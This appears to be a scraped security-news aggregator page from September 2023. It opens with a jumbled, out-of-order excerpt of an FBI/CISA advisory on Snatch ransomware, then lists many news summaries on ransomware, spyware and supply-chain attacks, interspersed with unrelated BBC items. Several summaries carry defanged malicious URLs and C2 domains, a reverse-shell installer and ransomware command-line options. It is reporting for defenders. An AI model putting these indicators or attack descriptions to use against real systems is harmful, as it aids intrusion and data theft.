            Since mid-2021, Snatch threat actors have consistently evolved their tactics to take advantage of current trends in the cybercriminal space and leveraged successes of other ransomware variants’ operations. Snatch threat actors have targeted a wide range of critical infrastructure sectors including the Defense Industrial Base (DIB), Food and Agriculture, and Information Technology sectors. Snatch threat actors conduct ransomware operations involving data exfiltration and double extortion. After data exfiltration often involving direct communications with victims demanding ransom, Snatch threat actors may threaten victims with double extortion, where the victims’ data will be posted on Snatch’s extortion blog if the ransom goes unpaid.

            FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.

            Download the PDF version of this report:

            Autosummary: (Incorrect file location, should be C:\Windows\System32\svchost.exe) Mutexes Created Mutexes Created \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-fc_key \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-sjlj_once \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-use_fc_key gcc-shmem-tdm2-fc_key gcc-hmem-tdm2-sjlj_once gcc-shmem-tdm2-use_fc_key MITRE ATT&CK TACTICS AND TECHNIQUES See Tables 4-16 for all referenced threat actor tactics and techniques in this advisory. In addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors: Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud). Registry Keys Registry Keys HKLM\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Servers\D8B548F0-E306-4B2B-BD82-25DAC3208786\FriendlyName HKU\S-1-5-21-4270068108-2931534202-3907561125-1001\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{ED50FC29-B964- 48A9-AFB3-15EBB9B97F36} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF System Log Changes Source Message TerminalServices-RemoteConnectionManager Remote session from client name exceeded the maximum allowed failed logon attempts. 
REPORTING The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from IP addresses, a sample ransom note, communications with Snatch threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI or CISA.In August 2023, individuals claiming to be associated with the blog gave a media interview claiming the blog was not associated with Snatch ransomware and “none of our targets has been attacked by Ransomware Snatch…”, despite multiple confirmed Snatch victims’ data appearing on the blog alongside victims associated with other ransomware groups, notably Nokoyawa and Conti.[1] Initial Access and Persistence Snatch threat actors employ several different methods to gain access to and maintain persistence on a victim’s network.Within this timeframe, Snatch threat actors exploited the victim’s network [T1590], moving laterally across the victim’s network with RDP [T1021.001] for the largest possible deployment of ransomware and searching for files and folders [T1005] for data exfiltration [TA0010] followed by file encryption [T1486]. to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).Snatch threat actors use sc.exe to configure, query, stop, start, delete, and add system services using the Windows Command line. 
Download the PDF version of this report: For a downloadable copy of IOCs, see: TECHNICAL DETAILS Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 13. The authoring agencies recommend that software manufacturers incorporate secure-by-design and -default principles and tactics into their software development practices for hardening software against ransomware attacks (e.g., to prevent threat actors from using Safe Mode to evade detection and file encryption), thus strengthening the secure posture for their customers. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov, a local FBI Field Office, or to CISA at report@cisa.gov or (888) 282-0870. VALIDATE SECURITY CONTROLS In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. Table 11: Snatch Threat Actors ATT&CK Techniques for Enterprise – Discovery Technique Title ID Use Query Registry T1012 Snatch threat actors may interact with the Windows Registry to gather information about the system, configuration, and installed software.


            Brazil: 14 killed after plane crashes in Amazon

            latam
            2023-09-17 https://www.bbc.co.uk/news/world-latin-america-66835213?at_medium=RSS&at_campaign=KARANGA
Officials say it appears the aircraft tried to land in bad weather but ran out of runway.



            Week in review: 17 free AWS cybersecurity courses, exploited Chrome zero-day

            exploits ciber
            2023-09-17 https://www.helpnetsecurity.com/2023/09/17/week-in-review-17-free-aws-cybersecurity-courses-exploited-chrome-zero-day/

            Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: The blueprint for a highly effective EASM solution In this Help Net Security interview, Adrien Petit, CEO at Uncovery, discusses the benefits that organizations can derive from implementing external attack surface management (EASM) solutions, the essential capabilities an EASM solution should possess, and how it deals with uncovering hidden systems. How should SMBs navigate the phishing minefield? In this Help … More

            The post Week in review: 17 free AWS cybersecurity courses, exploited Chrome zero-day appeared first on Help Net Security.


Autosummary: Bruschetta-Board: Multi-protocol Swiss Army knife for hardware hackers Bruschetta-Board is a device for all hardware hackers looking for a fairly-priced all-in-one debugger and programmer that supports UART, JTAG, I2C & SPI protocols and allows interaction with different target voltages (i.e., 1.8, 2.5, 3.3 and 5 Volts!).


            TikTok flooded by "Elon Musk" cryptocurrency giveaway scams

            financial
            2023-09-17 https://www.bleepingcomputer.com/news/security/tiktok-flooded-by-elon-musk-cryptocurrency-giveaway-scams/
TikTok is flooded by a surge of fake cryptocurrency giveaways posted to the video-sharing platform, with almost all of the videos pretending to be themes based on Elon Musk, Tesla, or SpaceX. [...]

Autosummary: Therefore, it is essential to recognize that almost every crypto giveaway site is a scam, especially those claiming to be from Elon Musk, Tesla, SpaceX, Ark Invest, Gemini, and high-profile exchanges and celebrities that promise massive returns.


            BlackCat ransomware hits Azure Storage with Sphynx encryptor

            exploits ransomware
            2023-09-16 https://www.bleepingcomputer.com/news/security/blackcat-ransomware-hits-azure-storage-with-sphynx-encryptor/
The BlackCat (ALPHV) ransomware gang now uses stolen Microsoft accounts and the recently spotted Sphynx encryptor to encrypt targets’ Azure cloud storage. [...]

Autosummary: For instance, in a new extortion approach last summer, the ransomware gang used a dedicated clear web website to leak the stolen data of a specific victim, providing the victim’s customers and employees with the means to determine whether their data had been exposed.


            ORBCOMM ransomware attack causes trucking fleet management outage

            exploits ransomware
            2023-09-15 https://www.bleepingcomputer.com/news/security/orbcomm-ransomware-attack-causes-trucking-fleet-management-outage/
Trucking and fleet management solutions provider ORBCOMM has confirmed that a ransomware attack is causing recent service outages that prevent trucking companies from managing their fleets. [...]

Autosummary: "Drivers using the identified ELDs may continue to record their hours of service on a paper graph grid or logging software, in accordance with § 395.8, until ORBCOMM notifies FMCSA that the malfunctioning Blue Tree ELDs have resumed service or by September 29, 2023, whichever occurs first," explains the FMCSA.


            The Week in Ransomware - September 15th 2023 - Russian Roulette

            exploits ransomware rusia-ucrania
            2023-09-15 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-15th-2023-russian-roulette/
This week’s big news is the extortion attacks on the Caesars and MGM Las Vegas casino chains, with one having already paid the ransom and the other still facing operational disruptions. [...]

Autosummary: Finally, some interesting research was released this week: Contributors and those who provided new ransomware information and stories this week include: @Seifreed, @malwareforme, @serghei, @malwrhunterteam, @BleepinComputer, @demonslay335, @Ionut_Ilascu, @LawrenceAbrams, @billtoulas, @vxunderground, @BroadcomSW, @MsftSecIntel, @AlvieriD, @WilliamTurton, @GeeksCyber, @pcrisk, and @Mandiant. September 11th 2023 MGM Resorts International disclosed today that it is dealing with a cybersecurity issue that impacted some of its systems, including its main website, online reservations, and in-casino services, like ATMs, slot machines, and credit card machines.


            Europol lifts the lid on cybercrime tactics

            industry
            2023-09-15 https://www.malwarebytes.com/blog/news/2023/09/europol-publishes-report-discussing-observed-methodologies-and-threats

            Categories: News

            Categories: Ransomware

            Tags: Europol

            Tags: Phishing

            Tags: RDP

            Tags: VPN

            Tags: Exchange

            Tags: LOTL

            Tags: BEC

            Tags: ransomware

            Tags: IAB

            Tags: crypter

            Tags: Flubot

            A Europol report discusses developments in cyberattacks, new methodologies, and threats as observed by Europol’s operational analysts.


            The post Europol lifts the lid on cybercrime tactics appeared first on Malwarebytes Labs.


Autosummary: The most common service providers for ransomware groups include initial access brokers (IABs), crypter developers, droppers-as-a-service, money laundering, and bullet-proof hosting services. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. These groups work closely with other malware-as-a-service groups to compromise high-revenue targets and post huge ransom demands, running into millions of Euros.


            Cybersecurity risks dampen corporate enthusiasm for tech investments

            ciber
            2023-09-15 https://www.helpnetsecurity.com/2023/09/15/cybersecurity-risks-innovative-tech-investments/

            64% of IT leaders believe that cybersecurity concerns are negatively impacting their organization’s willingness to invest in innovative tech, according to a report by HPE Aruba Networking. This is perhaps unsurprising as 91% either consider emerging tech a danger or admit to having already experienced a breach because of it. But this comes at a time when IT leaders must be empowered to embrace innovation such as generative AI to accelerate business-critical transformation – something … More

            The post Cybersecurity risks dampen corporate enthusiasm for tech investments appeared first on Help Net Security.


Autosummary: And IT leaders are investing accordingly – organizations are starting to press ahead with network-based security solutions, including Security Service Edge (SSE) or similar edge-to-cloud security (89%), policy-based network access control (88%), and Secure Access Service Edge (SASE) security (87%).


            DDoS 2.0: IoT Sparks New DDoS Alert

            industry
            2023-09-15 https://thehackernews.com/2023/09/ddos-20-iot-sparks-new-ddos-alert.html
The Internet of Things (IoT) is transforming efficiency in various sectors like healthcare and logistics but has also introduced new security risks, particularly IoT-driven DDoS attacks. This article explores how these attacks work, why they’re uniquely problematic, and how to mitigate them. What Is IoT? IoT (Internet of Things) refers to online, interconnected devices that collect and exchange

Autosummary: Process flow, demonstrating scanning, compromising, infecting and joining a new device to a botnet. Advanced botnets can self-propagate, compromising more devices autonomously, bringing more and more devices into the botnet, expanding the botnet’s size and amplifying the scale of future attacks. Controlled by attackers, botnets can scale and rapidly execute various attacks, including DDoS, data theft, ad fraud, cryptocurrency mining, spam and phishing, data harvesting, and snooping—without device owners’ knowledge. This broad category of devices includes sensors, cameras, network routers, and advanced machinery, and their integration into everyday life and work processes results in an ecosystem that can automate operations, improve decision-making, and enhance user experience. Incorporating IoT Devices into Botnets IoT devices that are unpatched, unattended, or misconfigured, or are already under botnet DDoS attack, are at risk of being incorporated into a botnet. Initiatives like the Cyber Threat Alliance and the Joint Cyber Defense Collaborative unite governments, tech companies, and cybersecurity firms to rapidly detect and neutralize emerging threats, strengthening collective global defenses.


            NodeStealer Malware Now Targets Facebook Business Accounts on Multiple Browsers

            exploits
            2023-09-15 https://thehackernews.com/2023/09/nodestealer-malware-now-targets.html
An ongoing campaign is targeting Facebook Business accounts with bogus messages to harvest victims’ credentials using a variant of the Python-based NodeStealer and potentially take over their accounts for follow-on malicious activities. "The attacks are reaching victims mainly in Southern Europe and North America across different segments, led by the manufacturing services and technology

Autosummary: "Compared to earlier variants, the new NodeStealer variant uses batch files to download and run Python scripts, and steal credentials and cookies from multiple browsers and for multiple websites," Michael said.


            Cybercriminals Combine Phishing and EV Certificates to Deliver Ransomware Payloads

            financial exploits ransomware ciber
            2023-09-15 https://thehackernews.com/2023/09/cybercriminals-combine-phishing-and-ev.html
The threat actors behind RedLine and Vidar information stealers have been observed pivoting to ransomware through phishing campaigns that spread initial payloads signed with Extended Validation (EV) code signing certificates. "This suggests that the threat actors are streamlining operations by making their techniques multipurpose," Trend Micro researchers said in a new analysis published this

Autosummary: "Because the ads look so legitimate, there is little doubt people will click on them and visit unsafe sites," Jérôme Segura, director of threat intelligence at Malwarebytes, said.


            Iranian Nation-State Actors Employ Password Spray Attacks Targeting Multiple Sectors

            government
            2023-09-15 https://thehackernews.com/2023/09/iranian-nation-state-actors-employ.html
Iranian nation-state actors have been conducting password spray attacks against thousands of organizations globally between February and July 2023, new findings from Microsoft reveal. The tech giant, which is tracking the activity under the name Peach Sandstorm (formerly Holmium), said the adversary pursued organizations in the satellite, defense, and pharmaceutical sectors to likely facilitate

Autosummary: Peach Sandstorm, also known by the names APT33, Elfin, and Refined Kitten, has been linked to spear-phishing attacks against aerospace and energy sectors in the past, some of which have entailed the use of the SHAPESHIFT wiper malware.


            Dariy Pankov, the NLBrute malware author, pleads guilty

            exploits
            2023-09-15 https://securityaffairs.com/150886/cyber-crime/dariy-pankov-nlbrute-author-pleads-guilty.html

            The Russian national Dariy Pankov, aka dpxaker, has pleaded guilty to conspiracy to commit wire and computer fraud. The Russian national Dariy Pankov (28), aka dpxaker, is the author of the NLBrute malware. The man has been extradited to the United States from Georgia.  In February 2023, Pankov was charged with conspiracy, access device fraud, […]

            The post Dariy Pankov, the NLBrute malware author, pleads guilty appeared first on Security Affairs.


Autosummary: Dariy Pankov, the NLBrute malware author, pleads guilty Pierluigi Paganini September 15, 2023 The Russian national Dariy Pankov, aka dpxaker, has pleaded guilty to conspiracy to commit wire and computer fraud.


            Free Download Manager backdoored to serve Linux malware for more than 3 years

            exploits
            2023-09-15 https://securityaffairs.com/150851/malware/free-download-manager-supply-chain-attack.html

            Researchers discovered a free download manager site that has been compromised to serve Linux malware to users for more than three years. Researchers from Kaspersky discovered a free download manager site that has been compromised to serve Linux malware. While investigating a set of suspicious domains, the experts identified that the domain in question has […]

            The post Free Download Manager backdoored to serve Linux malware for more than 3 years appeared first on Security Affairs.


Autosummary: The information stealer can collect multiple kinds of data, including system information, browsing history, saved passwords, cryptocurrency wallet files, as well as credentials for cloud services (AWS, Google Cloud, Oracle Cloud Infrastructure, Azure). “We observed the following actions that happen in all these videos: The video makers opened the legitimate website of Free Download Manager (freedownloadmanager[.]org) in the browser; They afterwards clicked on the Download button for the Linux version of the software; They were redirected to the malicious https://deb.fdmpkg[.]org/freedownloadmanager.deb URL that hosts the infected version of Free Download Manager.”


            Fernando Botero: Celebrated Colombian artist dies aged 91

            latam
            2023-09-15 https://www.bbc.co.uk/news/world-latin-america-66819339?at_medium=RSS&at_campaign=KARANGA
Colombia’s best-known artist, he won worldwide fame with sculptures and paintings of rotund figures.



            iPhone 15 launch: Wonderlust scammers rear their heads

            financial
            2023-09-14 https://www.malwarebytes.com/blog/personal/2023/09/iphone-15-launch-wonderlust-scammers-rear-their-heads

            Categories: Personal

            Tags: apple

            Tags: wanderlust

            Tags: cryptocurrency

            Tags: event

            Tags: BTC

            Tags: ETH

            Tags: fake

            We take a look at a cryptocurrency scam riding on the coat tails of the Apple Wonderlust event.


            The post iPhone 15 launch: Wonderlust scammers rear their heads appeared first on Malwarebytes Labs.


Autosummary: The site continues: To participate you just need to send from 0.1 BTC to 50 BTC to the contribution address and we will immediately send you back 0.2 BTC to 100 BTC (x2) to the address you sent it from. Posted: September 14, 2023.


            Windows 11 ‘ThemeBleed’ RCE bug gets proof-of-concept exploit

            exploits
            2023-09-14 https://www.bleepingcomputer.com/news/security/windows-11-themebleed-rce-bug-gets-proof-of-concept-exploit/
Security researcher Gabe Kirkpatrick has made a proof-of-concept (PoC) exploit available for CVE-2023-38146, aka "ThemeBleed," which enables attackers to trigger arbitrary remote code execution if the target opens a specially crafted ".theme" file. [...]

Autosummary: The researcher also notes that downloading a theme file from the web triggers the "mark-of-the-web" warning, which could alert the user of the threat.


            Manchester Police officers" data exposed in ransomware attack

            exploits ransomware
            2023-09-14 https://www.bleepingcomputer.com/news/security/manchester-police-officers-data-exposed-in-ransomware-attack/
United Kingdom’s Greater Manchester Police (GMP) said earlier today that some of its employees’ personal information was impacted by a ransomware attack that hit a third-party supplier. [...]

Autosummary: In late August, the Metropolitan Police (Met) published a similar announcement about hackers gaining access to the IT system of one of its suppliers, resulting in the exposure of names, ranks, photos, vetting levels, and pay numbers for 47,000 police officers and staff.


            Fake Cisco Webex Google Ads abuse tracking templates to push malware

            exploits
            2023-09-14 https://www.bleepingcomputer.com/news/security/fake-cisco-webex-google-ads-abuse-tracking-templates-to-push-malware/
Threat actors use Google Ads tracking templates as a loophole to create convincing Webex software search ads that redirect users to websites that distribute the BatLoader malware. [...]

Autosummary: If the visitor is one the threat actors wish to target, they will be redirected to a malware-dropping site at "webexadvertisingoffer[.]com," while all others will be redirected to Cisco’s legitimate "webex.com" site.


            Auckland transport authority hit by suspected ransomware attack

            exploits ransomware
            2023-09-14 https://www.bleepingcomputer.com/news/security/auckland-transport-authority-hit-by-suspected-ransomware-attack/
The Auckland Transport (AT) transportation authority in New Zealand is dealing with a widespread outage caused by a cyber incident, impacting a wide range of customer services. [...]

Autosummary: According to the latest update published earlier today, the following AT services have been impacted as a result of the attack: Online top-ups, as well as other AT HOP services using MyAT HOP on the AT website.


            MGM Resorts ESXi servers allegedly encrypted in ransomware attack

            exploits ransomware
            2023-09-14 https://www.bleepingcomputer.com/news/security/mgm-resorts-esxi-servers-allegedly-encrypted-in-ransomware-attack/
An affiliate of the BlackCat ransomware group, also known as ALPHV, is behind the attack that disrupted MGM Resorts’ operations, forcing the company to shut down IT systems. [...]

Autosummary: Link between Lapsus$ and UNC3944 source: Mandiant A Scattered Spider campaign called "0ktapus" was used to target over 130 organizations to steal Okta identity credentials and 2FA codes, with some of those targets including T-Mobile, MetroPCS, Verizon Wireless, AT&T, Slack, Twitter, Binance, KuCoin, CoinBase, Microsoft, Epic Games, Riot Games, Evernote, HubSpot, TTEC, and Best Buy. Once they gain access to admin credentials, they can perform further attacks, such as hijacking single sign-on administration, destroying backups, and, more recently, deploying the BlackCat/ALPHV ransomware to encrypt devices.


            Malwarebytes wins every Q2 MRG Effitas award & scores 100% on new phishing test

            financial exploits
            2023-09-14 https://www.malwarebytes.com/blog/business/2023/09/malwarebytes-wins-every-q2-mrg-effitas-award-scores-100-on-new-phishing-test

            Categories: Business

            Dive into where we prevented more than the rest and how we were able to do it.


            The post Malwarebytes wins every Q2 MRG Effitas award & scores 100% on new phishing test appeared first on Malwarebytes Labs.


Autosummary: MRG Effitas assesses a product’s ability to meet today’s most pressing threats, including stopping zero-day malware, ransomware, exploits, and more—and doing so with speedy performance and low false positives. Nebula view of detected ransomware activity 100% of banking malware blocked We were one of the few vendors who earned a 360° Online Banking Certification, which means Malwarebytes EP stopped 100% of threats designed to steal financial information and money from victims’ accounts.


            MGM casino"s ESXi servers allegedly encrypted in ransomware attack

            exploits ransomware
            2023-09-14 https://www.bleepingcomputer.com/news/security/mgm-casinos-esxi-servers-allegedly-encrypted-in-ransomware-attack/
An affiliate of the BlackCat ransomware group, also known as ALPHV, is behind the attack that disrupted MGM Resorts’ operations, forcing the company to shut down IT systems. [...]

Autosummary: Link between Lapsus$ and UNC3944 source: Mandiant A Scattered Spider campaign called "0ktapus" was used to target over 130 organizations to steal Okta identity credentials and 2FA codes, with some of those targets including T-Mobile, MetroPCS, Verizon Wireless, AT&T, Slack, Twitter, Binance, KuCoin, CoinBase, Microsoft, Epic Games, Riot Games, Evernote, HubSpot, TTEC, and Best Buy. Once they gain access to admin credentials, they can perform further attacks, such as hijacking single sign-on administration, destroying backups, and, more recently, deploying the BlackCat/ALPHV ransomware to encrypt devices.


            BLASTPASS: Government agencies told to secure iPhones against spyware attacks

            government
            2023-09-14 https://www.tripwire.com/state-of-security/government-agencies-told-secure-iphones-against-spyware-attacks
CISA, the United States’ Cybersecurity and Infrastructure Security Agency, has ordered federal agencies to patch their iPhones against vulnerabilities that can be used as part of a zero-click attack to install spyware from the notorious NSO Group. Read more in my article on the Tripwire State of Security blog.

Autosummary: Once in place, the Pegasus spyware can spy on SMS messages, emails, photos and videos, contacts, WhatsApp communications, calendars, calls, chats, GPS location data, and the microphone and camera.


            Greater Manchester Police latest force to suffer serious data breach

            financial
            2023-09-14 https://grahamcluley.com/greater-manchester-police-latest-force-to-suffer-serious-data-breach/
Uh-oh, yet another UK police force has suffered a serious data breach. After the incidents involving Cumbria Police, Norfolk and Suffolk Police, and – perhaps worst of all – the PSNI in Northern Ireland, it’s now Greater Manchester Police finding itself in the hot seat.



            Free Download Manager Site Compromised to Distribute Linux Malware to Users for 3+ Years

            exploits
            2023-09-14 https://thehackernews.com/2023/09/free-download-manager-site-compromised.html
A download manager site served Linux users malware that stealthily stole passwords and other sensitive information for more than three years as part of a supply chain attack. The modus operandi entailed establishing a reverse shell to an actor-controlled server and installing a Bash stealer on the compromised system. The campaign, which took place between 2020 and 2022, is no longer active.

Autosummary: The Debian package contains a post-install script that’s executed upon its installation to drop two ELF files, /var/tmp/bs and a DNS-based backdoor (/var/tmp/crond) that launches a reverse shell to a command-and-control (C2) server, which is received in response to a DNS request to one of the four domains - 2c9bf1811ff428ef9ec999cc7544b43950947b0f.u.fdmpkg[.]org c6d76b1748b67fbc21ab493281dd1c7a558e3047.u.fdmpkg[.]org 0727bedf5c1f85f58337798a63812aa986448473.u.fdmpkg[.]org c3a05f0dac05669765800471abc1fdaba15e3360.u.fdmpkg[.]org "The communication protocol is, depending on the connection type, either SSL or TCP," the researchers said.


            N-Able"s Take Control Agent Vulnerability Exposes Windows Systems to Privilege Escalation

            exploits
            2023-09-14 https://thehackernews.com/2023/09/n-ables-take-control-agent.html
A high-severity security flaw has been disclosed in N-Able’s Take Control Agent that could be exploited by a local unprivileged attacker to gain SYSTEM privileges. Tracked as CVE-2023-27470 (CVSS score: 8.8), the issue relates to a Time-of-Check to Time-of-Use (TOCTOU) race condition vulnerability, which, when successfully exploited, could be leveraged to delete arbitrary files on a Windows

Autosummary: Tracked as CVE-2023-27470 (CVSS score: 8.8), the issue relates to a Time-of-Check to Time-of-Use (TOCTOU) race condition vulnerability, which, when successfully exploited, could be leveraged to delete arbitrary files on a Windows system.


            Russian Journalist"s iPhone Compromised by NSO Group"s Zero-Click Spyware

            rusia-ucrania
            2023-09-14 https://thehackernews.com/2023/09/russian-journalists-iphone-compromised.html
The iPhone belonging to Galina Timchenko, a prominent Russian journalist and critic of the government, was compromised with NSO Group’s Pegasus spyware, a new collaborative investigation from Access Now and the Citizen Lab has revealed. The infiltration is said to have happened on or around February 10, 2023. Timchenko is the executive editor and owner of Meduza, an independent news publication

Autosummary: The Committee to Protect Journalists (CPJ) said "journalists and their sources are not free and safe if they are spied on, and this attack on Timchenko underscores that governments must implement an immediate moratorium on the development, sale, and use of spyware technologies."


            Lockbit ransomware gang hit the Carthage Area Hospital and the Clayton-Hepburn Medical Center in New York

            exploits ransomware
            2023-09-14 https://securityaffairs.com/150835/cyber-crime/lockbit-ransomware-carthage-area-hospital.html

            LockBit ransomware group breached two hospitals, the Carthage Area Hospital and the Clayton-Hepburn Medical Center in New York. The Lockbit ransomware group claims to have hacked two major hospitals, the Carthage Area Hospital and Claxton-Hepburn Medical Center. The two hospitals serve hundreds of thousands of people in upstate New York. The cyberattack took place at […]

            The post Lockbit ransomware gang hit the Carthage Area Hospital and the Clayton-Hepburn Medical Center in New York appeared first on Security Affairs.


Autosummary: Lockbit ransomware gang hit the Carthage Area Hospital and the Clayton-Hepburn Medical Center in New York Pierluigi Paganini September 14, 2023 LockBit ransomware group breached two hospitals, the Carthage Area Hospital and the Clayton-Hepburn Medical Center in New York. Affiliates of the Lockbit gang have also hit other healthcare organizations in the past: in early December 2022, the Hospital Centre of Versailles was hit by a cyber attack that was attributed to the group.


            UK Greater Manchester Police disclosed a data breach

            financial
            2023-09-14 https://securityaffairs.com/150828/data-breach/greater-manchester-police-gmp-data-breach.html

            UK Greater Manchester Police (GMP) disclosed a data breach, threat actors had access to some of its employees’ personal information. UK Greater Manchester Police (GMP) announced that threat actors had access to the personal information of some of its employees after an unnamed third-party supplier was hit with a ransomware attack. The GMP reported that […]

            The post UK Greater Manchester Police disclosed a data breach appeared first on Security Affairs.




            The iPhone of a Russian journalist was infected with the Pegasus spyware

            rusia-ucrania
            2023-09-14 https://securityaffairs.com/150816/intelligence/russian-journalists-iphone-pegasus-spyware.html

            The iPhone of a prominent Russian journalist, who is at odds with Moscow, was infected with NSO Group’s Pegasus spyware. The iPhone of the Russian journalist Galina Timchenko was compromised with NSO Group’s Pegasus spyware. A joint investigation conducted by Access Now and the Citizen Lab revealed that the journalist, who is at odds with the Russian government, […]

            The post The iPhone of a Russian journalist was infected with the Pegasus spyware appeared first on Security Affairs.


Autosummary: “Sophisticated spyware like Pegasus, which bypasses encryption and takes full control of the victim’s phone, including access to photos, messages, and contacts, as well as the phone’s camera and microphone, represents an existential threat to journalists and media freedom globally.”


            Quest to bring priest charged with torture in Argentina to justice

            latam
            2023-09-14 https://www.bbc.co.uk/news/world-latin-america-66574950?at_medium=RSS&at_campaign=KARANGA
Father Franco Reverberi is wanted in Argentina on charges of murder and torture under military rule.



            Brazil riots: First man tried for storming government buildings gets 17 years

            latam government industry
            2023-09-14 https://www.bbc.co.uk/news/world-latin-america-66810835?at_medium=RSS&at_campaign=KARANGA
            Aecio Pereira is the first to be convicted over the storming of government buildings in January. "

            Autosummary: "


            What Nasa said about those "alien corpses" in Mexico

            latam
            2023-09-14 https://www.bbc.co.uk/news/world-us-canada-66791954?at_medium=RSS&at_campaign=KARANGA
            The BBC asked scientists about the extraordinary evidence presented to Mexican lawmakers this week. "

            Autosummary: "


            Hackers use new 3AM ransomware to save failed LockBit attack

            exploits ransomware
            2023-09-13 https://www.bleepingcomputer.com/news/security/hackers-use-new-3am-ransomware-to-save-failed-lockbit-attack/
            A new ransomware strain called 3AM has been uncovered after a threat actor used it in an attack that failed to deploy LockBit ransomware on a target network. [...] "

            Autosummary: According to Symantec’s malware analysis, the 3AM Rust-based 64-bit executable recognizes the following command-line parameters:
            - "-k" - 32 Base64 characters, the "access key" in the ransom note
            - "-p" - unknown
            - "-h" - unknown
            - "-m" - method, where the code checks for one of two values ("local" or "net") before running encryption logic
            - "-s" - determines offsets within files for encryption to control encryption speed, expressed as decimal digits
            “The attacker also executed various Cobalt Strike components and tried to escalate privileges on the computer using PsExec” - Symantec Threat Hunter Team. The researchers observed the use of commands commonly used for reconnaissance (e.g. whoami, netstat, quser, and net share), enumerating servers (e.g. quser, net view), adding a new user for persistence, and the use of the old wput FTP client to copy files to the attacker’s server. "


            How end-user phishing training works (and why it doesn’t)

            financial
            2023-09-13 https://www.bleepingcomputer.com/news/security/how-end-user-phishing-training-works-and-why-it-doesnt/
            Training end-users to spot phishing has its benefits, but it’s clear to see organizations as a whole have failed to make a dent in phishing attacks. Learn more from Specops Software on how phishers use social engineering to exploit human psychology. [...] "

            Autosummary: Unusual sending times; out-of-the-ordinary requests; spoofed display names (slightly altered to appear legitimate at a glance, e.g. Miicrosoft); low-quality images. Catching the clever parts: there are also more subtle tactics that are more likely to be employed in targeted, planned phishing attacks such as spear phishing, CEO fraud, executive impersonation, supply chain compromise, or business email compromise. The key limitation of training is that even if SAT is delivered with regular reinforcement, accidents still happen, especially when end-users are under pressure to make decisions quickly in their day-to-day jobs. Spotting the obvious stuff: SAT helps individuals spot the telltale signs of phishing attacks by helping users "practice" seeing them in real-world, controlled environments. It can enforce compliance requirements, block over 3 billion unique passwords, and help users create stronger passwords with dynamic, informative client feedback. Training end-users to spot phishing has its benefits, but it’s clear to see organizations as a whole have failed to make a dent in phishing attacks. "


            Rollbar discloses data breach after hackers stole access tokens

            financial
            2023-09-13 https://www.bleepingcomputer.com/news/security/rollbar-discloses-data-breach-after-hackers-stole-access-tokens/
            Software bug-tracking company Rollbar disclosed a data breach after unknown attackers hacked its systems in early August and gained access to customer access tokens. [...] "

            Autosummary: "


            Patch now! September Microsoft Patch Tuesday includes two actively exploited zero-days

            exploits
            2023-09-13 https://www.malwarebytes.com/blog/news/2023/09/patch-now-september-microsoft-patch-tuesday-includes-two-actively-exploited-zero-days

            Categories: Business

            Categories: Exploits and vulnerabilities

            Categories: News

            Tags: Microsoft

            Tags: Adobe

            Tags: Android

            Tags: Apple

            Tags: Chrome

            Tags: SAP

            Tags: Exchange

            Tags: Visual Studio

            Tags: CVE-2023-36761

            Tags: CVE-2023-36802

            Tags: CVE-2023-29332

            Tags: Azure

            Microsoft’s September 2023 Patch Tuesday is another important one. It patches two vulnerabilities which are known to be actively exploited.

            (Read more...)

            The post Patch now! September Microsoft Patch Tuesday includes two actively exploited zero-days appeared first on Malwarebytes Labs.

            "

            Autosummary: A critical vulnerability which can be expected to have some impact is: CVE-2023-29332 (CVSS score 7.5 out of 10): a Microsoft Azure Kubernetes Service Elevation of Privilege (EoP) vulnerability. The Cybersecurity & Infrastructure Security Agency (CISA) has added these two vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. "


            Researchers Detail 8 Vulnerabilities in Azure HDInsight Analytics Service

            industry
            2023-09-13 https://thehackernews.com/2023/09/researchers-detail-8-vulnerabilities-in.html
            More details have emerged about a set of now-patched cross-site scripting (XSS) flaws in the Microsoft Azure HDInsight open-source analytics service that could be weaponized by a threat actor to carry out malicious activities. "The identified vulnerabilities consisted of six stored XSS and two reflected XSS vulnerabilities, each of which could be exploited to perform unauthorized actions, "

            Autosummary: "These weaknesses collectively allow an attacker to inject and execute malicious scripts when the stored data is retrieved and displayed to users," Ben Shitrit noted, urging organizations to implement adequate input validation and output encoding to "ensure that user-generated data is properly sanitized before being displayed in web pages." "


            Rust-Written 3AM Ransomware: A Sneak Peek into a New Malware Family

            exploits ransomware
            2023-09-13 https://thehackernews.com/2023/09/rust-written-3am-ransomware-sneak-peek.html
            A new ransomware family called 3AM has emerged in the wild after it was detected in a single incident in which an unidentified affiliate deployed the strain following an unsuccessful attempt to deliver LockBit (attributed to Bitwise Spider or Syrphid) in the target network. "3AM is written in Rust and appears to be a completely new malware family," the Symantec Threat Hunter Team, part of "

            Autosummary: "We’ve seen no evidence ourselves to suggest that this affiliate has used 3AM again, but we’re not surprised to see other reports of 3AM’s use," Dick O’Brien, principal intelligence analyst at Symantec, told The Hacker News. "


            How Cyberattacks Are Transforming Warfare

            ciber
            2023-09-13 https://thehackernews.com/2023/09/how-cyberattacks-are-transforming.html
